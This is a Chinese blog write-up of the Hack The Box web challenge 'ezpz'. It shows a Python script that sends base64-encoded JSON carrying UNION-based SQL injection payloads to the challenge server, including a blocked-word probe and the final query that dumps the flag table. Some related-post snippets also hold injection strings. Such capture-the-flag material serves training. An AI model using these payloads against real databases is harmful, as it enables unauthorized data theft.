hack the box[HTB]web题之ezpz

最新推荐文章于 2024-11-05 15:28:12 发布
最新推荐文章于 2024-11-05 15:28:12 发布
阅读量2.1k 收藏
点赞数
分类专栏: hackthebox 文章标签: web python 渗透 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39682037/article/details/105775196
版权

ezpz

题目描述

Can you get the flag?

流程

这个题目描述说和没说一个样,直接上网站吧。

emmm,PHP页面,后台还有两个警告。好像可以拿着两个做文章
在这里插入图片描述
第一个警告是:obj未定义变量,那么直接在url里面为obj赋值
猜想正确
在这里插入图片描述
第二行报错是:尝试从一个空对象获取ID属性
这里小编忘记截图了,思路就是xxx/index.php?obj={"ID":"1"},发现警告没消失,(这里小编试了好几次?obj=ID%3d1|?obj={"ID":"1"}|?obj=<ID>1</ID>)则
F12,看看页面是不是还有其他信息,发现页面说 都是用base64进行编码的
在这里插入图片描述
用burpsuite转码成base64,当然也可以用python的base64库
在这里插入图片描述
这时候发现页面正常了,那我们也就知道注入格式为?obj={"ID","xxxx"}
在这里插入图片描述
手工一个个转码成base64然后注入太麻烦了,上脚本吧
在这里插入图片描述
没问题,只需要更改payload即可。

代码如下:

import requests
import base64
from bs4 import BeautifulSoup

def injection(payload):
    params = {
        "obj": base64.b64encode(payload.encode())
    }
    url = "http://docker.hackthebox.eu:30964/index.php"
    r = requests.get(url, params=params)
    soup = BeautifulSoup(r.text, 'html.parser')
    print(soup.body.text.strip())

if __name__ == '__main__':
    payload = '{"ID": "1"}'
    injection(payload)

成功拿下flag
在这里插入图片描述
小编这里尝试了较多次的payload ,我把每次尝试的payload都写在下方代码中,大家也可以一个个试体验尝试一下。

import requests
import base64
from bs4 import BeautifulSoup

def injection(payload):
    params = {
        "obj": base64.b64encode(payload.encode())
    }
    url = "http://docker.hackthebox.eu:30964/index.php"
    r = requests.get(url, params=params)
    # 数据处理
    soup = BeautifulSoup(r.text, 'html.parser')
    print(soup.body.text.strip())

def get_blocked_word(s):
    words = s.split(" ")
    for word in words:
        payload = '{{"ID": "-1\' union select * from ((select 1)A join (select \'{}\')B);#"}}'.format(word)
        print(word, injection(payload))



if __name__ == '__main__':
    # # 第1次尝试
    # payload = '{"ID": "1"}'
    # # 第2次尝试
    # payload = '{"ID": "-1\' union select 1, 2"}'
    # # 第3次尝试
    # payload = '{"ID": "-1\' union select * from ( (select 1)A join ( select 2 )B );#"}'
    # # 第4次尝试
    # payload = '{"ID": "-1\' union select * from ( (select 1)A join ( select length(user()) )B );#"}'
    # # 第5次尝试
    # s = "select table_name from information_schema.columns"
    # get_blocked_word(s)
    # 第6次尝试
    payload = '{"ID": "-1\' union select * from ( (select 1)A join ( select * from FlagTableUnguessableEzPZ )B );#"}'
    injection(payload)
qq_39682037
关注
专栏目录
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
hack the box[HTB]web之FreeLancer
qq_39682037的博客
04-27 3000
觉得是sql注入,让我来试一下 http://docker.hackthebox.eu:30643?id=1 尝试失败,再来看下页面 这是啥,好像发现了新大陆 http://docker.hackthebox.eu:30643/portfolio.php?id=-1 union select 1,group_concat(table_name),3 from information_s...
[HackTheBox]WEB
baguangman5501的博客
09-28 966
0x01 [50 Points] I know Mag1k 问描述: Can you get to the profile page of the admin? 访问分配的地址,是一个带注册的登入页面: 尝试常规注入,无效 来到注册页面注册,再退出,在使用已有的用户名登入会发现有一个用户名枚举的漏洞 这时的一个思路就是先通过暴力破解,枚举出管理员的用户名,然后结合二次注入注册一个类...
hack the box[HTB] 邀请码
qq_39682037的博客
05-02 3051
搞了半天,就是叫你发送一个POST请求到 /api/invite/generate gohb@gohb:~$ sudo curl -X POST https://www.hackthebox.eu/api/invite/generate
HttpWebRequest类详解
有梦想的菜鸟
12-05 6232
HttpWebRequest类与HttpRequest类的区别。       HttpRequest类的对象用于服务器端,获取客户端传来的请求的信息,包括HTTP报文传送过来的所有信息。而HttpWebRequest用于客户端,拼接请求的HTTP报文并发送等。       HttpWebRequest这个类非常强大,强大的地方在于它封装了几乎HTTP请求报文里需要用到的东西,以致于能够能够发送任意...
新版HackTheBox记录(WP)
midi
04-19 3311
HTB(Hack the box)做笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
hack the box[HTB]web之Fuzzy
qq_39682037的博客
05-11 1933
gohb@gohb:~/桌面$ gobuster dir -u http://docker.hackthebox.eu:30568/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt gohb@gohb:~$ gobuster dir -u http://docker.hackthebox.eu:30568/ap...
Hack The Box -- Blazorized
qq_22792465的博客
07-06 1750
http://blazorized.htb/_framework/blazor.webassembly.js 中存在一些json文件,min.js中是编码文件并没有找到其他路径。没见过的直接给度娘+gpt,既然是基于Blazor框架那就搜一搜Blazor的信息。
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3594
是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 3019
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
Hackthebox------Jerry
大方子
11-24 3091
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
hack the box (web)
m0_38094687的博客
04-08 5452
接下来是2道web,来自hack the box。这个网站还真是厉害啊,邀请码要靠自己破解网页的一个小trick。话不多说看。 - Cartographer (30) - HDC (30) Cartographer sql注入大水 使用username='='&amp;amp;password='='的方式绕过 访问一下info=flag即可得到 HDC 这...
hack the box[HTB]web之Emdee five for life
qq_39682037的博客
04-27 2789
Can you encrypt fast enough? import requests import hashlib import re url="http://docker.hackthebox.eu:30826/" r=requests.session() out=r.get(url) out=re.search("<h3 align='center'>+.*?&lt...
hack the box[HTB]web之Grammar
qq_39682037的博客
05-07 1949
When we access this page we get a Forbidden error. However we believe that something strange lies behind… Can you find a way in and retrieve the flag? 真的像目描述一样是forbidden 页面请求数据不正常 看下页面响应是否正常 好像没有异常...
智能化运维的未来:AI和机器学习在运维中的应用
Echo_Wish的博客
11-05 506
AI和机器学习在运维中的应用,不仅提高了运维效率和质量,还为企业的数字化转型提供了强有力的技术支持。通过预测性维护、自动化运维、异常检测和智能告警等应用,企业可以更好地管理和优化其IT基础设施,确保系统的高效、稳定运行。希望本文能为读者提供有价值的参考,帮助你在运维实践中更好地应用AI和机器学习技术。如果有任何问或需要进一步讨论,欢迎交流探讨。让我们共同推动智能运维的发展,实现更高效、更智能的运维管理。
【anaconda】使用记录
最新发布
zhuyan108的博客
11-05 333
window11 下安装anaconda。
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助用户了解真实世界中的网络漏洞和攻击技术,并提供一个安全的环境来进行学习和实践。 请注意,使用 Hack The Box 平台进行未经授权的攻击是违法的。这个平台仅用于合法的学习和研究目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值